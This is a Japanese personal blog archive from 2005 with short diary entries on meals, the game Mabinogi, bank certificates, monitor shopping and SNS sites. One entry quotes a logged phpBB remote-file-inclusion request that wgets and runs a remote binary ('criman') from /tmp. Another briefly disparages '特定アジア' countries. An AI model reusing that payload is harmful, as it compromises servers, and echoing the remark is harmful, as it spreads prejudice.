2005-01-01から1年間の記事一覧

夕飯

昨日は店売りの鶏肉を食べたので、外で豪華に食事。給料も入ったので酒も入れることにした。自分のマンションの隣にできた中華料理店で相方と食事。値段が気がかりだったが、20%off券があったので問題なし。心行くまで食べた。春巻きと最後に食べたラーメン…

コンサート

昨日は1日中ゲームをしていたので、今日は前々からチケットを取っていた(買わされた?)コンサートに相方と行って来た。アカペラのコンサートらしい http://www.ismusic.ne.jp/doo-wop/ 「アカペラ」と言われても、始めは良く分からなかった。昔に何かで聴い…

クリスマスイブ

08:00 起床&朝食 09:00 洗濯&マビノギ 10:00 洗濯&マビノギ 11:00 マビノギ 12:00 コインランドリー&昼食(まるまつ) 13:00 マビノギ 14:00 マビノギ 15:00 マビノギ 16:00 マビノギ 17:00 マビノギ 18:00 マビノギ 19:00 マビノギ 20:00 買い物 21:00 夕…

G3ペッカ特攻

マギノビでジェネレーション3が始まって1週間が過ぎた。しかし、最初の難問ぺッカダンジョンの突破に予想通り引っ掛かり、どうしたものか考えていた。スキルをもう少し伸ばしてから行くことも考えたが、時間がかかりすぎるので、ダンバートンでパーティを募…

夢を見よう

年末に向けてお金が欲しい。しかしギャンブルは合わないし、年末ジャンボなぞ当たるわけも無い。12月に入ってから、食費を削ってきたので1万ほど軍資金があった。これを使って簡単に儲かる方法として、ナンバーズやロト6、スクラッチくじがあげられた。しか…

恋愛偏差値ゲーム

http://www.sunmarie.com/magazine/game/index.html あなたの得点と恋愛偏差値をご報告します! ■あなたの得点は・・・・・【 77点 】でした。 ■あなたの偏差値は・・・・【 54 】です。 ******* 現在の全国平均点【 68.9点 】 ******** ━━━━━━━━━━━━━━━━━━━…

2005年 〜自宅編〜

ペンギンさんのお母さんの調子は、落ち着いているようです。 相方が非常に不安定になりました。理由はいろいろ マビノギを始めました パソコンをグレードアップしました。次回は内部コアが4つ以上になってから。 旅行に行きました。今年は京都 式場めぐりを…

2005年 〜仕事編〜

部長陣がよからぬことを考えているらしい、という話がある。どうも、今の仕事を外注化すとのこと じゃあ、いよいよ異動か〜 今度のこそ、構築部隊に行きたいな アナリストにならないか? 工エエエエエ(´Д`)エエエエエ工 それ AC の仕事ですか? サポセンの仕…

今年

気が付くと、今年はあと2週間しかない。勤務日数はあと8日である。せっかくなので、1年を振り返ってみた。箇条書き&メモなので、読みにくいです。

phpファイルへの妙なアクセス

最近、下記のようなリクエストをよく見る。 GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.***/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.***/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1 GET…

1025/tcp

どうも昨日から、1025/tcp のスキャンが増大している。スラドによるとDCOM の脆弱性を狙っているとのことだが、後日MS05-051 の脆弱性を狙ったものと判明した。下記にリンクをまとめておく。 1025/TCPのトラヒック増加 【情報】MS05-051への攻撃増加について…

残高証明

一昨日の日記で、"残高証明"のメモを書いた。その後、社長のコメントをみて気になったので、他の銀行の発行手数料を調べてみた。(2005/12/10 現在の手数料)*1 ヤレヤレ ┐(´ー`)┌ マイッタネ レベル 三井住友銀行 http://www.smbc.co.jp/kojin/fee/index.html その他の…

プライバシーマーク

プライバシーマークという制度がある。よく知らないが、個人情報を適切に扱っている企業を認定しする制度のようだ。私が勤めている会社でも、数ヶ月前からこの制度を取得するべく色々と審査や試験があった。ところが、たまたまベクターでこのマークを見て、…

預貯金残高証明書(常陽銀行の場合)

発行は銀行にて 発行手数料は525円 発行には、銀行の登録印と通帳が必要 どちらかが欠けていても、発行は不可能 印鑑が違う場合、身分証明を見せれば、印影を確認することが可能 証明書には、手書きと印字がある 手書きの場合は、即日発行可能*1 印字の場合…

所得証明

発行は役所にて 発行手数料は300円 取れるのは前年度以降の証明 そのため今年の証明は、来年以降でないと取ることができない 今年の証明が必要な場合は、源泉徴収証を会社からもらう どこに問い合わせをすればくれるかは、会社次第 ちなみに、うちの会社では…

印鑑証明

登録、発行ともに役所 登録には300円必要 登録する印鑑には、種類、大きさの制限がある 印鑑証明を取るときには、実印はいらず発行時にもらったカードを渡す 本人以外が証明を取るときは、委任状が必要 証明の発行には300円必要

メールアドレス

うちのプロバイダは J:COM とかいう、胡散臭いプロバイダだ。マンション入居時、選択肢が、"電話線"、"ISDN"、"ケーブル"の3つしかなかったので、仕方が無しにケーブルになった。回線速度は、実家より良好で特別な問題がない。しかし、最大の問題が最近出て…

ぷらっとホームが閉店セール

とりあえず、金曜の勤務明けに行く。安かったら "The Digital Hotspotter" 等、無線LANの電波探知機を買う予定。

コンビニに行こう

夜勤のときは、もっぱら「ローソン」で買い物をしている。ローソンパスを使ってポイントを貯めるため、他のコンビニには行きづらいのである。しかし夜勤を始めて、既に1年以上が過ぎた。そのため商品も飽き、食べるものを探すのが面倒になってきた。 私が初…

みかか

最近、会社から自宅へ作業用に pcAnywhere を使っているのだが、どうも上りが遅い。測定サイトで測ってみると、上りが約 3M/bps、下りが 14M/bps と出る。pcAnywhere の推奨速度は分からないが、現状満足に動いているとは言えないので、9月にBフレッツの申し…

インフルエンザ

会社に行くとインフルエンザ予防接種に関するメールが届いていた。シフト勤務の私たちに倒れられると困るので、あらかじめやっておけといことなのだろうが、日付を調節してほしかった。つまり夜勤明けに行けと、会社様はおっしゃられるわけで。 未だ注射を打…

リンク

最近よく行く、特定アジア系のニュースを扱うサイトを追加。これらのニュースを読んで、まだ特定アジアと共存しようと考えている人がいたら(考えは人其々だが)、某新聞しか読まないという人がいたら、立ち止まってもう一度考え直して欲しい。追記 antennaモ…

日記の扱い

SNS というサービスはこれで、mixi と GREE の2つになった。どちらも本腰を入れてやっているわけではないので、違いがよく分からないが、外部の日記に関する扱いは大きく異なるようだ。mixi の場合、外部の日記(はてなダイアリー)を自分の日記に設定すると、…

mixi

以前GREEに関する日記を書いた。当時はよく分からなかったので、適当に登録し放置していた。最近、相方がmixiにハマっているようで、登録するよう指令を受けた。招待自体は今年の5月半ばにもらっていたのだが、登録する項目が多く、あとで登録すればいいやと…

セール

というわけで、セールに行ってきた。電気屋でもなく、秋葉原でもなく、日暮里の繊維街の冬のセールである。というのも、相方が最近マビノギの影響を受けて裁縫に凝っているようで、いろいろとバックやスカートを作っている。今日はその材料の買出しに出かけ…

液晶ディスプレイ 〜到着編〜

一番安かった店が、翌日に品物を撤去していたり、商品と一緒に送られてくる商品券がついていなかったりと、色々問題があったが、無事に商品が届き、設置も完了した。(写真は後日アップ予定)さっそく電源を入れ動作検証。 まずは、動きが多い "FF7 ADVENT CHI…

液晶ディスプレイ 〜救世主編〜

救世主は"メシア"と読むと幸せになれます。嘘です。 会計ペンギン様は私などより、顔が広い。そのおかげで、他社に潜り込んでは色々と話をしたり、お手伝いをしたりしているらしいのだが、そこで NANAO の液晶を見たらしい。その液晶は、私が買おうとしてい…

液晶ディスプレイ 〜思考編〜

10月に入ってから、自宅の液晶を換えようか考えていた。というのも、会社で使ってるディスプレイが NANAO になり、その綺麗さに自宅のも換えたくなったのだ。さっそく値段を調べてみると、NANAO の液晶は他社より1万近く高く、容易に買える価格ではない。会…

魔法の粉

マビノギの世界で、魔法の粉といえば下記をさす。アイテムに付加能力をエンチャントする際に必要。失敗することもあるが、ゲームを有利に進めていくには欠かせないアイテムだ。 話を現実世界に戻す。私個人的に、魔法の粉と言えば下記をさす。 これを使うこ…

日記

会社の人にばれたらしい。備忘録に。